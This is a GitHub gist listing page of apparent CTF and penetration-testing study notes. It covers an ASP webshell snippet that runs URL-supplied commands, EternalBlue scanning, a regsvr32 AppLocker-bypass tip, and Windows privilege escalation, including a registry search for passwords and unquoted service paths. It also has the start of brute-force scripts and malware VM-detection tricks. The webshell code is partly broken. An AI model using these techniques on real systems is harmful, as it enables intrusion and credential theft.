
@dumpmycode
dumpmycode / MASMexercises.md
Last active June 9, 2023 22:44
Assembly Language by Kip Irvine exercises
  1. Swap elements in array, e[0] with e[1], e[2] with e[3] and so on. Need to read more on faster xchg instruction, xor?
    var dd 1,2,3,4,5,6,7,8
        mov esi, OFFSET var
        mov ecx, LENGTHOF var / 2       ; processing 2 elements at one time
    xchgloop:
        mov eax, DWORD PTR [esi]        ; eax = e[i]   (1 on the first pass)
        xchg eax, DWORD PTR [esi+4]     ; e[i+1] <- eax, eax <- old e[i+1]
        mov DWORD PTR [esi], eax        ; e[i] <- old e[i+1]
        add esi, TYPE var * 2           ; move to next 2 elements
        loop xchgloop                   ; ecx pairs in total
==============================================================================================
FLAGS - Visual Studio

| Flag | VS name | 1 = | 0 = |
|---|---|---|---|
| Overflow | OV | Overflow | No Overflow |
| Direction | UP | Down | Up |
| Interrupt | EI | Enabled | Disabled |
| Sign | PL | Negative | Positive |
| Zero | ZR | Zero | Not Zero |
| Auxiliary | AC | | |
| Parity | PE | Even | Odd |
| Carry | CY | Carry | No Carry |
dumpmycode / NotesOnASP.md
Last active May 8, 2019 09:47
Notes on ASP/ASPX webshells

Notes on asp/aspx shells on IIS: found a great pdf regarding this topic by Joseph Giron.

The document details some old-school methods of 'interacting' with the server-side process. We'll need a way to insert the ASP code somehow; in CTFs this is usually possible via R/W FTP access or RFI.

  1. ASP shell with VB by using Wscript.shell to execute commands given from url input
  • example:
    <%
    Set command = Request.QueryString("cmd")
    if command == "" then
    Response.Write("No Command Entered!");

Notes for eternal blue (SMB port 445 attack)

Use nmap to check whether port 445 is vulnerable to EternalBlue: `nmap -n -Pn --script=vuln x.x.x.x -p 445`

  • Named pipe is required for manual exploit, enumerate by using pipe_auditor msf module
  • Opting for a reverse shell called from regsvr32 to bypass AppLocker. Calling binaries directly from cmd will usually get flagged by AV; calling them through regsvr32 with an unregistered DLL is most likely OK, since regsvr32 is often used by the OS (whitelisted).
dumpmycode / WinPrivEsc.md
Last active April 10, 2022 18:56
Windows Privilege Escalation notes

First, get more info on system.

  • systeminfo, whoami /priv*, set or echo %username%
    • check for hotfixes, OS name, version, arch, environment variables & system (VM). Then look for vulns respective of the system.
  • reg query HKLM /f password /t REG_SZ /s, wmic or sc query
    • check the PS version; see if we can run reg query, wmic or sc commands for further info on the system.

*Privilege escalation by abusing token privilege (foxglovesecurity blog). Required permission to escalate:

  • SeImpersonatePrivilege
dumpmycode / rpc brute force.py
Last active May 29, 2024 13:01
rpcclient brute force
#!/usr/bin/python3
import argparse
import threading
import subprocess as s
import queue
import sys
import time
class workerthread(threading.Thread):
dumpmycode / Unquoted service path (DOS)
Created December 4, 2018 02:38
Unquoted service path (DOS)
# Get service names without admin access (wmic)
sc query | findstr SERVICE_NAME >> test.txt
# process the file service names for unquoted service path
# tokens=2 will take the second delimited value and put it in %A
for /F "tokens=2 delims=:" %A in (test.txt) do sc qc%A | findstr BINARY_PATH_NAME >> unquoted.txt
# Once we determine which application is vulnerable to this exploit, we then check for write permission
# on that particular folder so we can replace application with our own in hope of getting privilege escalation.
BINARY_PATH_NAME : C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe
dumpmycode / note.txt
Last active November 1, 2018 01:02
VMAwareMalware
Ways that malware can check for a virtual environment:
• Checking the MAC address of the virtual network adaptor to try and reveal the virtual machine vendor.
• Checking the BIOS brand and version to reveal the virtual machine vendor.
• Checking certain registry keys that are unique to virtual machines. Virtual machines often leave traces in different registry keys; for example, the existence of “HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__” reveals the presence of VirtualBox.
• Checking if helper tools, such as VMware tools, are installed.
• Checking for the presence of certain process and service names.
• Checking for the presence of specific files, like drivers specific to virtualization.
• Checking for communication ports for guest-to-host communication.
dumpmycode / diff.py
Created September 7, 2016 04:51
File compare
#!/usr/bin/env python
# author:op
# this script tries to loop every line in file1 and compare it to all lines in file2
# spits out what's not matching
import argparse
parser = argparse.ArgumentParser(description='Find difference between file1.txt and file2.txt')
parser.add_argument('filename1')
parser.add_argument('filename2')
dumpmycode / brute.py
Last active August 13, 2016 05:25
Bandit24->25 bruteforce
#! /usr/bin/env python
# Author: op
# Trying to measure script run time including printing output to screen;
# seems like it only measures execution time.
import socket
import time
pwd = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ '